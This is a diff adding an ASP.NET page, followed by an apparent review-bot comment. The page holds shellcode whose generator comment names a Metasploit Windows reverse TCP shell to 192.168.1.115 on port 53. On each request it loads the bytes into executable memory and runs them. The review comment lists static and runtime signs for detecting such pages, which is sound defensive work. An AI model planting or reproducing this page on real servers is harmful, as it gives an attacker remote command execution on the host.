|
| 1 | +<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %> |
| 2 | + |
| 3 | +<%@ Import Namespace="System" %> |
| 4 | +<%@ Import Namespace="System.Runtime.InteropServices" %> |
| 5 | + |
| 6 | +<script runat="server"> |
| 7 | + delegate int MsfpayloadProc(); |
| 8 | + protected void Page_Load(object sender, EventArgs e) |
| 9 | + { |
| 10 | + byte[] codeBytes = { |
| 11 | + |
| 12 | +//msfpayload windows/shell_reverse_tcp LHOST=192.168.1.115 LPORT=53 X C |
| 13 | +
|
| 14 | +0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89, |
| 15 | +0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b, |
| 16 | +0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28, |
| 17 | +0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c, |
| 18 | +0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d, |
| 19 | +0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52, |
| 20 | +0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78, |
| 21 | +0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20, |
| 22 | +0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49, |
| 23 | +0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac, |
| 24 | +0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75, |
| 25 | +0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75, |
| 26 | +0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66, |
| 27 | +0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3, |
| 28 | +0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, |
| 29 | +0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff, |
| 30 | +0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d, |
| 31 | +0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77, |
| 32 | +0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26, |
| 33 | +0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00, |
| 34 | +0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b, |
| 35 | +0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40, |
| 36 | +0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0, |
| 37 | +0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8, |
| 38 | +0x01,0x73,0x68,0x02,0x00,0x00,0x35,0x89, |
| 39 | +0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5, |
| 40 | +0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c, |
| 41 | +0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5, |
| 42 | +0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64, |
| 43 | +0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6, |
| 44 | +0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7, |
| 45 | +0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,0x24, |
| 46 | +0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56, |
| 47 | +0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56, |
| 48 | +0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89, |
| 49 | +0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08, |
| 50 | +0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5, |
| 51 | +0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff, |
| 52 | +0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0, |
| 53 | +0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, |
| 54 | +0x00,0x53,0xff,0xd5 |
| 55 | + }; |
| 56 | + IntPtr handle = IntPtr.Zero; |
| 57 | + handle = VirtualAlloc( |
| 58 | + IntPtr.Zero, |
| 59 | + codeBytes.Length, |
| 60 | + MEM_COMMIT | MEM_RESERVE, |
| 61 | + PAGE_EXECUTE_READWRITE); |
| 62 | + try |
| 63 | + { |
| 64 | + Marshal.Copy(codeBytes, 0, handle, codeBytes.Length); |
| 65 | + MsfpayloadProc msfpayload |
| 66 | + = Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc; |
| 67 | + msfpayload(); |
| 68 | + } |
| 69 | + finally |
| 70 | + { |
| 71 | + VirtualFree(handle, 0, MEM_RELEASE); |
| 72 | + } |
| 73 | + } |
| 74 | + //Windows API |
| 75 | + [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")] |
| 76 | + public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect); |
| 77 | + [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")] |
| 78 | + public static extern bool VirtualFree(IntPtr address, int size, uint freeType); |
| 79 | + //flags |
| 80 | + const uint MEM_COMMIT = 0x1000; |
| 81 | + const uint MEM_RESERVE = 0x2000; |
| 82 | + const uint PAGE_EXECUTE_READWRITE = 0x40; |
| 83 | + const uint MEM_RELEASE = 0x8000; |
| 84 | +</script> |
| 85 | + |
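Review bot: Nothing in this file says what it is: `Page_Load` (lines 8–73) copies the embedded byte array into `PAGE_EXECUTE_READWRITE` memory obtained from `VirtualAlloc` and calls it through a delegate on every request, with no check on who is requesting the page, and the only comment is the generator command on line 12. A server-side header comment such as `<%-- Test artifact: on each request this page runs the embedded native payload inside the ASP.NET worker process; see the generator command below --%>` would tell whoever finds the file in a web root what they are looking at. For content scanning, the combination visible here is a strong static indicator: an .aspx page that declares a `DllImport` of `VirtualAlloc`, passes protection `0x40`, and calls `Marshal.GetDelegateForFunctionPointer`. The comment on line 12 names a reverse TCP shell to 192.168.1.115 on port 53, so the matching runtime signals are presumably the worker process opening an outbound TCP connection on port 53 and starting a command interpreter as a child process.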